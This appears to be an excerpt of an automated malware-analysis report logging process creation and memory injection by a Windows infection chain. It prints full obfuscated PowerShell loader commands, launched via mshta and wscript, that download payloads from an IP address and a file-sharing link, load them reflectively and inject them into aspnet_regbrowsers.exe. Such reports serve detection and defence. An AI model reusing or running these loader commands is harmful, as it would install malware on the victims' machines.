Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 415000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4A0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 7EFDE008

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtag9tzvsymv0rjfbzae9tzvszmf0rj3gnksaoicgoj3n3umltywdlvxjsid0gnww3jysnahr0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxignww3o3n3undlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c3dsaw1hz2vcexrlcya9ihn3undlyknsawvudc5eb3dubg9hzerhdgeoc3dsaw1hz2vvcmwpo3n3jysnumltywdlvgv4dca9ifttexn0zw0nkycuvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhn3umltywdlqnl0zxmpo3n3unn0yxj0rmxhzya9idvsnzw8qkenkydtrty0x1nuqvjupicrjz41bdc7c3dszw5krmxhzya9idvsnzw8qkftrty0x0vord4+nww3o3n3unmnkyd0yxj0sw5kzxggpsbzd1jpbwfnzvrlehqusw5kzxhpzicrjyhzd1jzdgfydezsywcpo3n3umvuzeluzgv4id0gc3dsaw1hz2vujysnzxh0lkluzgv4t2yoc3dszw5krmxhzyk7c3dsc3rhcnrjjysnbmrlecatz2ugmcatyw5kihmnkyd3umvuzeluzgv4ic1ndcbzd1jzdgenkydydeluzgv4o3n3unn0yxj0sw5kzxggkz0gc3dsc3rhcnrgbgfnlkxlbmd0adtzd1jiyxnlnjrmzw5ndgggpsbzd1jlbmrjbmrlecatihn3unn0yxj0sw5kzxg7c3dsymfzzty0q29tbwfuzca9ihn3umltywdlvgv4dc5tdwjzjysndhjpbmcoc3dsc3rhcnrjbmrlecwgc3dsymfzzty0tgvuz3rokttzd1jiyxnlnjrszxzlcnnlzca9ic1qbycrj2luichzd1jiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgrncxjysniccrj0zvckvhy2gtt2jqzwn0ihsgc3dsxyb9kvstms4ulshzd1jiyxnlnjrdb21tyw5klkxlbmd0acldo3n3umnvbw1hbmrcexrlcya9jysnifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoc3dsymfzzty0umv2zxjzzwqpo3n3umxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchzd1jjb21tyw5kqnl0zxmpo3n3unzhau1ldghvzca9iftkjysnbmxpyicrjy5jty5ib21lxs5hzxrnzxrob2qonww3vkfjnww3kttzd1j2ywlnzxrob2qusw52b2tlkhn3um51bgwsieaonww3dhh0llruukxqtvmvmtqvmtqxljy3ms4zlji5ms8vonb0dgg1bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg8nkyc1bdcsiccrjzvsn2fzcg5ldf9yzwdicm93c2vyczvsnywgnww3zccrj2vzyxrpdmfkbzvsnywgnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3mtvsnyw1bddkzxnhdgl2ywrvnww3ksk7jykglxjluexhy0unnww3jyxby0hhcl0zosatcmvqtgfjrsanc3dsjyxby0hhcl0zniaglunszxbmqwnlicanrncxjyxby0hhcl0xmjqpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[21]+$pshome[30]+'x') ( (('swrimageurl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 5l7;swrwebclient = new-object system.net.w'+'ebclient;swrimagebytes = swrwebclient.downloaddata(swrimageurl);sw'+'rimagetext = [system'+'.text.encoding]'+'::utf8.getstring(swrimagebytes);swrstartflag = 5l7<<ba'+'se64_start>'+'>5l7;swrendflag = 5l7<<base64_end>>5l7;swrs'+'tartindex = swrimagetext.indexof'+'(swrstartflag);swrendindex = swrimaget'+'ext.indexof(swrendflag);swrstarti'+'ndex -ge 0 -and s'+'wrendindex -gt swrsta'+'rtindex;swrstartindex += swrstartflag.length;swrbase64length = swrendindex - swrstartindex;swrbase64command = swrimagetext.subs'+'tring(swrstartindex, swrbase64length);swrbase64reversed = -jo'+'in (swrbase64command.tochararray('+') fw1'+' '+'foreach-object { swr_ })[-1..-(swrbase64command.length)];swrcommandbytes ='+' [system.convert]::frombase64string(swrbase64reversed);swrloadedassembly = [system.reflection.assembly]::load(swrcommandbytes);swrvaimethod = 